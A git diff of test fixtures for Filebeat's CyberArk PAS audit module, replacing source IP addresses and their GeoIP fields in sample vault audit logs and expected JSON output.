@@ -1,2 +1,2 @@ -<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} +<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:03:43\n 2021-03-11T18:03:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 4\n User Authentication\n Error\n Administrator\n User Authentication\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n User Authentication\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User 
Authentication","GatewayStation":"10.0.1.20"}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
index edcea4388a2f..a3c58e23c0d8 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/4_user_authentication.log-expected.json
@@ -8,7 +8,7 @@
 "cyberarkpas.audit.message": "User Authentication",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Error",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:42:36",
 "event.action": "authentication_failure",
 "event.category": [
@@ -34,22 +34,19 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -88,7 +85,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 584,
+ "log.offset": 583,
 "log.syslog.priority": "7",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
index f3d9bd31a393..0c6f306c8a8e 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log
@@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PVWAAppUser","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"Root\\syntaxparser-conf.json.1.1","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-10T18:36:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:36:22","IsoTimestamp":"2021-03-10T18:36:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-10T22:17:56Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} -<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-10T22:17:56Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:56","IsoTimestamp":"2021-03-10T22:17:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} +<5>1 2021-03-11T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.14\n \n \n \n \n \n Store File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:27","IsoTimestamp":"2021-03-11T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n Administrator\n Store File\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Store File\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"50","Desc":"Store File","Severity":"Info","Issuer":"Administrator","Action":"Store File","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store File","GatewayStation":"10.0.1.20"}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json index f1d9caf02d7f..a4c608ad4920 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/50_store_file.log-expected.json @@ -51,7 +51,7 @@ "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "PSMPConf", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:21", "event.action": "store file", "event.code": "50", 
@@ -71,19 +71,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -113,7 +110,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1194,
+ "log.offset": 1193,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
@@ -141,7 +138,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PVWAConfig",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:17:56",
 "event.action": "store file",
 "event.code": "50",
@@ -154,25 +151,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1782,
+ "log.offset": 1781,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -186,11 +181,11 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:27Z",
 "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.message": "Store File",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 81.32.170.205\n \n \n \n \n \n Store File\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:27\n 2021-03-11T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 50\n Store File\n Info\n PSMPApp_VAGRANT\n Store File\n \n \n PSMRecordings\n root\\87012dcc-8290-11eb-949e-080027efd402.SSH.txt\n 67.43.156.14\n \n \n \n \n \n Store File\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMRecordings",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 09:38:27",
 "event.action": "store file",
 "event.code": "50",
@@ -203,26 +198,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2374,
+ "log.offset": 2372,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -256,7 +248,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3898,
+ "log.offset": 3894,
 "log.syslog.priority": "5",
 "network.direction": "internal",
 "observer.hostname": "VAULT",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
index d9d8af79da43..f8464908b9bd 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log
@@ -1,9 +1,9 @@ <5>1 2021-03-08T18:32:43Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:32:43","IsoTimestamp":"2021-03-08T18:32:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T18:38:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:38:21","IsoTimestamp":"2021-03-08T18:38:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"VaultInternal","File":"Root\\Operating System-WinServerLocal-components-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinServerLocal"},{"Name":"UserName","Value":"adriansr"},{"Name":"Address","Value":"components"},{"Name":"LogonDomain","Value":"COMPONENTS"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-08T19:20:04Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 
11:20:04","IsoTimestamp":"2021-03-08T19:20:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PasswordManager","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PasswordManager_workspace","File":"Root\\Test_4","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} -<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 35.192.121.42\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} +<5>1 2021-03-11T18:59:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:59:57\n 2021-03-11T18:59:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n PSMApp_ASR-WIN\n Delete File\n \n \n PSMSessions\n Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\n 67.43.156.12\n \n \n \n \n \n Delete File\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:59:57","IsoTimestamp":"2021-03-11T18:59:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete 
File","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":""}}} <5>1 2021-03-11T19:32:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:32:12\n 2021-03-11T19:32:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 127.0.0.1\n \n \n \n \n \n Delete File\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:32:12","IsoTimestamp":"2021-03-11T19:32:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"_PSMLiveSessions_1","Value":""},{"Name":"_PSMLiveSessions_2","Value":""},{"Name":"_PSMLiveSessions_3","Value":""},{"Name":"_PSMLiveSessions_4","Value":""},{"Name":"_PSMLiveSessions_5","Value":""}]}}}} -<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.12-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.12-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.12"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n 
\n yes\n Mar 11 13:06:50\n 2021-03-11T21:06:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSM-ASR-CYBERARK-WI\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}} <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:10:17\n 2021-03-14T12:10:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSMAdmin\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}} <5>1 2021-03-15T15:09:00Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:09:00\n 2021-03-15T15:09:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n partner\n Root\\Database-Oracle-10.128.0.7-adrian\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/52_delete_file.log-expected.json 